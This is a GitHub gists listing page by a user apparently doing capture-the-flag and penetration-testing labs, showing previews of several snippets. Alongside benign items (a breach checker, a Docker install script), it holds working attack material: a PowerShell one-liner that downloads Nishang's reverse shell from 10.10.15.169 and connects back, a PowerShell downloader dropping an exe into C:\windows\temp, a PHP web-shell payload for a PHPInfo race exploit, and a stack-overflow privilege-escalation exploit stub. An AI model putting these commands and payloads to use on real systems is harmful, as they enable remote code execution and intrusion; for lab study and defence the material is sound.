Skip to content

Instantly share code, notes, and snippets.

intrd

Block or report user

Report or block intrd

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@intrd
intrd / hpwned.py
Last active Mar 11, 2019
Haveibeenpwned mail leaked mass checker
View hpwned.py
## Haveibeenpwned mail leaked mass checker
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# usage: python hpwned.py maillist.txt
import requests, json, time, sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@intrd
intrd / leakcheck_kanonymity.txt
Created Mar 19, 2018
One-liner password leak check + k-anonymity method (w/out exposing the password on request)
View leakcheck_kanonymity.txt
## One-liner password leak check + k-anonymity method (w/out exposing the password on request)
# Compute the SHA1, Grab 1st 5 chars of the hash, check by range on huge haveibeenpwnd DB!
# original source: https://news.ycombinator.com/item?id=16432344
VARPWD='test123'; HASH=`echo -n $VARPWD | sha1sum`; curl --silent https://api.pwnedpasswords.com/range/`cut -b 1-5 <(echo $HASH)` --stderr - | grep -i `cut -b 6- <(echo $HASH) | cut -d ' ' -f 1`
@intrd
intrd / phpinfo_exploit.py
Last active Mar 4, 2019
PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
View phpinfo_exploit.py
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## passwords.txt payload content
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re
from subprocess import Popen, PIPE, STDOUT
View Kali 2017.1 x64, Docker-ce Install script
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get remove docker docker-engine docker.io* lxc-docker*
# install dependencies 4 cert
@intrd
intrd / Invoke-PowerShellTcp.ps1
Created Nov 16, 2017
Reverse powershell by Nikhil SamratAshok Mittal - https://github.com/samratashok/nishang
View Invoke-PowerShellTcp.ps1
#Reverse powershell by Nikhil SamratAshok Mittal - https://github.com/samratashok/nishang
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
@intrd
intrd / powershell_download_exec.ps1
Last active Nov 16, 2017
Powershell download & execute (anyver)
View powershell_download_exec.ps1
# Powershell download & execute (anyver)
# http://dann.com.br/
# Invoke-PowerShellTcp.ps1 (Reverse powershell) - https://gist.github.com/intrd/d5086206bdef0ba1d7776c5325547626
powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002
@intrd
intrd / casino2.py
Created Oct 24, 2017
casino 2 - prog150 @ hackaflag 2017 - porto alegre
View casino2.py
#!/usr/bin/python
## casino 2 - prog150 @ hackaflag 2017 - porto alegre
# @author intrd - http://dann.com.br/ + pwn4food team
# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat
@intrd
intrd / cry_t0k3n_brute.py
Last active Sep 21, 2017
Solution for cry_t0k3n @ Global Cyberlympics Prequals 2017 (cryptcat multithread bruteforcer)
View cry_t0k3n_brute.py
## Solution for cry_t0k3n @ Global Cyberlympics Prequals 2017 (cryptcat multithread bruteforcer)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import sys,Queue,threading,hashlib,os,time
from subprocess import Popen, PIPE, STDOUT
NumOfThreads=5
queue = Queue.Queue()
@intrd
intrd / sneaky_priv_esc_xpl.py
Last active Apr 14, 2018
Sneaky box priv_esc XPL (ret2stack+nopsled+shellcode) @ hackthebox.eu
View sneaky_priv_esc_xpl.py
#!/usr/bin/python
## Sneaky box priv_esc XPL (ret2stack+nopsled+shellcode) @ hackthebox.eu
# @author intrd - http://dann.com.br/
import struct
exploit = "A"*362
#exploit += struct.pack("I",0xffffd638+10) #topstack local
#exploit += "\xCC"*4
exploit += struct.pack("I",0xbffff6e8+10) #topstack remote
@intrd
intrd / powershell_wget_oneliner.ps1
Last active Nov 11, 2018
Powershell WGET one-liner (anyver)
View powershell_wget_oneliner.ps1
# Powershell oneliner wget (anyver)
# http://dann.com.br/
@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')
You can’t perform that action at this time.